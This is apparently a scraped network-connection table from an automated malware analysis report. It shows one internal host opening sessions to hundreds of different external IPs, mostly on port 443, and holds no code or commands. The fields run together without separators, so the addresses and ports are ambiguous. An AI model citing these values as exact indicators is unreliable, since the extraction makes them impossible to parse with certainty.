                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18368192.168.2.2359440138.131.251.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18369192.168.2.234143040.51.97.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18370192.168.2.2357768173.69.143.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18371192.168.2.2347536207.77.255.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18372192.168.2.2348318173.21.195.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18373192.168.2.234321076.223.208.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18374192.168.2.2342008129.32.109.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18375192.168.2.234373040.117.217.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18376192.168.2.233723870.155.46.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18377192.168.2.233982640.131.135.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18378192.168.2.2348914115.27.121.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18379192.168.2.233466474.226.184.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18380192.168.2.2360768188.238.228.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18381192.168.2.234531212.79.39.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18382192.168.2.2345426197.125.92.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18383192.168.2.2346878142.51.87.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18384192.168.2.2341762147.159.165.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18385192.168.2.235554465.53.168.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18386192.168.2.2335324128.117.134.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18387192.168.2.234720248.7.56.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18388192.168.2.233564467.80.59.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18389192.168.2.235584071.59.23.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18390192.168.2.2358740175.92.14.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18391192.168.2.234895665.9.52.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18392192.168.2.2352814169.217.215.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18393192.168.2.2349466168.62.240.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18394192.168.2.234857431.77.152.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18395192.168.2.235323849.70.209.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18396192.168.2.2334514114.48.182.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18397192.168.2.235252079.240.122.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18398192.168.2.2341858102.200.100.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18399192.168.2.2337058147.35.232.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18400192.168.2.234727231.1.209.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18401192.168.2.2343620125.175.222.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18402192.168.2.2345816174.99.244.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18403192.168.2.2349698158.82.79.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18404192.168.2.233774019.62.83.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18405192.168.2.233531463.101.80.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18406192.168.2.2333696179.62.21.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18407192.168.2.235820223.138.22.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18408192.168.2.2356876158.66.83.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18409192.168.2.2359224163.75.125.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18410192.168.2.2354182112.113.151.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18411192.168.2.2345616105.154.185.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18412192.168.2.2333296198.36.99.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18413192.168.2.2355464115.15.72.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18414192.168.2.2346022161.29.157.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18415192.168.2.235938238.210.191.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18416192.168.2.2350846105.38.4.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18417192.168.2.235255866.230.28.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18418192.168.2.2349812129.219.221.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18419192.168.2.235829886.58.223.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18420192.168.2.2360152207.61.117.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18421192.168.2.2360938102.22.237.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18422192.168.2.2354046213.106.225.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18423192.168.2.233583075.51.239.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18424192.168.2.2358152223.20.172.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18425192.168.2.233946251.137.227.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18426192.168.2.2338868152.98.2.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18427192.168.2.2358688130.240.192.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18428192.168.2.234048832.253.54.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18429192.168.2.234180059.178.77.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18430192.168.2.233374073.152.179.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18431192.168.2.2356374189.225.135.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18432192.168.2.23380969.27.108.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18433192.168.2.2339014169.137.9.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18434192.168.2.23459562.99.83.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18435192.168.2.2355382168.140.42.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18436192.168.2.2334974154.250.215.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18437192.168.2.2339306221.96.13.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18438192.168.2.2349194104.230.28.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18439192.168.2.2352798212.174.104.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18440192.168.2.2347562171.172.37.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18441192.168.2.2354524141.39.101.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18442192.168.2.2346570176.230.101.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18443192.168.2.233487089.14.4.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18444192.168.2.2352172109.172.44.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18445192.168.2.234090294.50.59.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18446192.168.2.23572382.118.88.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18447192.168.2.2360902154.162.16.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18448192.168.2.235284274.136.161.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18449192.168.2.2336446108.48.97.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18450192.168.2.235815858.221.221.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18451192.168.2.234289476.142.129.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18452192.168.2.233975071.8.113.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18453192.168.2.2346320113.4.23.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18454192.168.2.2336838102.21.100.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18455192.168.2.233462289.232.168.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18456192.168.2.2347022154.61.9.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18457192.168.2.234744497.244.249.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18458192.168.2.236003482.49.77.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18459192.168.2.233322213.85.195.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18460192.168.2.2344358221.90.72.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18461192.168.2.2360038109.49.176.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18462192.168.2.2349768180.199.68.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18463192.168.2.233896899.137.173.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18464192.168.2.233504661.187.0.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18465192.168.2.234841688.39.160.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18466192.168.2.235641253.122.110.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18467192.168.2.2353586140.85.174.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18468192.168.2.2340374150.185.28.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18469192.168.2.2355058156.32.112.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18470192.168.2.2352868101.76.78.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18471192.168.2.2356462137.140.183.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18472192.168.2.234806861.186.201.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18473192.168.2.2354548114.250.194.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18474192.168.2.2355228146.169.192.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18475192.168.2.233956663.47.6.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18476192.168.2.2352110100.151.169.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18477192.168.2.234025294.103.58.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18478192.168.2.234280235.133.67.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18479192.168.2.235345476.203.67.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18480192.168.2.2352890202.143.183.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18481192.168.2.2333332119.228.96.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18482192.168.2.2356300162.174.62.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18483192.168.2.235113849.191.162.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18484192.168.2.234555442.84.125.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18485192.168.2.2334768149.207.103.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18486192.168.2.2352108198.231.79.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18487192.168.2.23439281.75.2.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18488192.168.2.2360044153.78.153.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18489192.168.2.2344126145.3.119.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18490192.168.2.2357562218.245.7.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18491192.168.2.2347552188.151.131.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18492192.168.2.2341612112.6.252.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18493192.168.2.235739493.3.254.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18494192.168.2.233679044.168.4.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18495192.168.2.2344840155.247.100.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18496192.168.2.2358720132.102.252.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18497192.168.2.2359144221.216.196.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18498192.168.2.233866297.243.158.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18499192.168.2.2350160171.244.2.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18500192.168.2.235432486.171.138.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18501192.168.2.2341370170.98.168.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18502192.168.2.2358830182.131.242.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18503192.168.2.235592482.141.0.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18504192.168.2.236084263.88.52.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18505192.168.2.2343816147.9.153.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18506192.168.2.2348786102.115.121.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18507192.168.2.2340668135.47.34.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18508192.168.2.2347338152.59.173.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18509192.168.2.234488242.51.128.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18510192.168.2.2335594137.151.174.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18511192.168.2.2339864115.133.121.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18512192.168.2.2341668125.2.192.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18513192.168.2.2340596128.93.117.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18514192.168.2.235766468.195.80.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18515192.168.2.235696499.41.117.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18516192.168.2.235425614.233.46.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18517192.168.2.2336084175.82.1.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18518192.168.2.23437901.101.146.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18519192.168.2.2333846133.243.97.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18520192.168.2.2355774142.24.143.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18521192.168.2.233710642.149.100.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18522192.168.2.234442478.148.89.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18523192.168.2.2349310111.217.226.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18524192.168.2.2337636156.165.25.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18525192.168.2.2357274137.133.158.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18526192.168.2.2341896204.51.54.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18527192.168.2.2358640178.106.17.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18528192.168.2.23502525.108.66.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18529192.168.2.235634220.14.31.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18530192.168.2.2349658164.130.28.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18531192.168.2.2350596210.127.241.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18532192.168.2.2350346122.82.74.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18533192.168.2.2334764141.94.211.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18534192.168.2.2357160193.132.119.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18535192.168.2.2334690140.118.58.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18536192.168.2.2358160160.48.5.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18537192.168.2.2345966169.234.52.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18538192.168.2.233322097.226.181.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18539192.168.2.2359204177.78.27.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18540192.168.2.2354606128.239.49.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18541192.168.2.2347244120.106.137.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18542192.168.2.2341838217.227.239.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18543192.168.2.235604463.66.136.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18544192.168.2.2348738174.202.227.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18545192.168.2.234318667.142.193.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18546192.168.2.233662023.175.53.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18547192.168.2.2341752176.210.69.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18548192.168.2.2345236196.198.247.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18549192.168.2.233483878.131.138.578080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18550192.168.2.233840267.156.2.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18551192.168.2.2336016138.209.187.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18552192.168.2.2344674217.159.176.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18553192.168.2.2348978111.170.135.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18554192.168.2.2333528160.126.157.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18555192.168.2.235984419.45.171.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18556192.168.2.233530625.83.104.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18557192.168.2.2339234188.208.237.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18558192.168.2.2339868139.210.123.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18559192.168.2.234605478.107.131.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18560192.168.2.2335440187.90.197.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18561192.168.2.2344426164.155.76.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18562192.168.2.2351880158.113.148.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18563192.168.2.235621453.181.228.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18564192.168.2.234996887.74.238.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18565192.168.2.2346376149.214.169.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18566192.168.2.2356516204.61.63.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18567192.168.2.2349100219.64.207.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18568192.168.2.2360696169.84.50.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18569192.168.2.2336640217.185.127.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18570192.168.2.234971297.42.28.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18571192.168.2.2358126213.124.102.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18572192.168.2.2349224123.238.186.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18573192.168.2.233338876.137.242.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18574192.168.2.236096450.167.190.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18575192.168.2.2350050118.29.121.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18576192.168.2.234776858.95.0.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18577192.168.2.235674467.178.145.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18578192.168.2.2338874109.5.172.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18579192.168.2.2344448106.57.226.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18580192.168.2.2339682152.123.222.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18581192.168.2.2334156197.29.114.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18582192.168.2.2348054153.151.213.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18583192.168.2.2356628200.240.163.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18584192.168.2.2339078150.109.109.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18585192.168.2.2349276113.248.195.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18586192.168.2.2341720162.103.181.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18587192.168.2.2342350113.229.127.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18588192.168.2.233848088.151.80.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
